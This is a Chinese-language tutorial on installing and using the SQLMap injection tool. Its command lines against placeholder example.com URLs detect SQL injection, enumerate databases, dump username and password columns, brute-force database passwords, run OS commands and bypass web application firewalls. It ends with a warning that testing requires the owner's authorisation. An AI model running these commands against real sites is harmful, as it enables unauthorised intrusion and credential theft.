安装

1. 安装 Python

SQLMap 是基于 Python 开发的，所以要先安装 Python 环境。建议安装 Python 3.9 或更高版本，可从 Python 官方网站 下载对应操作系统的安装包，然后按照安装向导完成安装。

2. 获取 SQLMap

可以从 SQLMap 的官方 GitHub 仓库克隆代码：

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

也可以直接从 GitHub 下载压缩包，解压到指定目录。

基本使用

1. 检测单一 URL 的注入漏洞

使用 -u 参数指定目标 URL 进行注入检测：

python sqlmap.py -u "http://example.com/vulnerable_page.php?id=1"

SQLMap 会自动检测该 URL 是否存在 SQL 注入漏洞，并尝试确定注入类型（如布尔型、时间型、联合查询型等）。

2. 处理带有 Cookie 的请求

如果目标网站需要登录状态才能访问，可以使用 --cookie 参数传递 Cookie 信息：

python sqlmap.py -u "http://example.com/vulnerable_page.php?id=1" --cookie="session_id=abcdef123456; user=testuser"

3. 处理 POST 请求

对于使用 POST 方法提交数据的表单，可以使用 -d 参数指定 POST 数据：

python sqlmap.py -u "http://example.com/login.php" -d "username=test&password=test"

数据库信息获取

1. 列出所有数据库

若检测到注入漏洞，可使用 --dbs 参数列出目标数据库服务器上的所有数据库：

python sqlmap.py -u "http://example.com/vulnerable_page.php?id=1" --dbs

2. 列出指定数据库中的表

使用 -D 参数指定数据库名，--tables 参数列出该数据库中的所有表：

python sqlmap.py -u "http://example.com/vulnerable_page.php?id=1" -D testdb --tables

3. 列出指定表中的列

使用 -T 参数指定表名，--columns 参数列出该表中的所有列：

python sqlmap.py -u "http://example.com/vulnerable_page.php?id=1" -D testdb -T users --columns

4. 提取数据

使用 -C 参数指定要提取的列名，--dump 参数提取数据：

python sqlmap.py -u "http://example.com/vulnerable_page.php?id=1" -D testdb -T users -C username,password --dump

高级功能

1. 暴力破解数据库密码

使用 --passwords 参数可以尝试暴力破解数据库用户的密码：

python sqlmap.py -u "http://example.com/vulnerable_page.php?id=1" --passwords

2. 执行系统命令（仅适用于支持的数据库）

对于某些数据库（如 MySQL），可以使用 --os-cmd 参数执行系统命令：

python sqlmap.py -u "http://example.com/vulnerable_page.php?id=1" --os-cmd="ls -l"

3. 绕过 WAF（Web 应用防火墙）

使用 --tamper 参数可以指定一些绕过 WAF 的脚本，例如使用 apostrophemask 脚本来绕过对单引号的过滤：

python sqlmap.py -u "http://example.com/vulnerable_page.php?id=1" --tamper=apostrophemask

注意事项

• 合法性：必须在获得目标系统所有者明确授权的情况下使用 SQLMap 进行测试，未经授权的渗透测试属于违法行为。
• 数据安全：在测试过程中，要注意避免对目标系统造成数据损坏、服务中断等不良影响。
• 性能影响：SQLMap 的某些操作可能会对目标系统造成较大的性能压力，建议在非生产环境或低峰期进行测试。
• 防护机制：对于一些使用了高级防护机制的网站，SQLMap 可能无法直接检测到注入漏洞，需要结合其他技术和工具进行分析。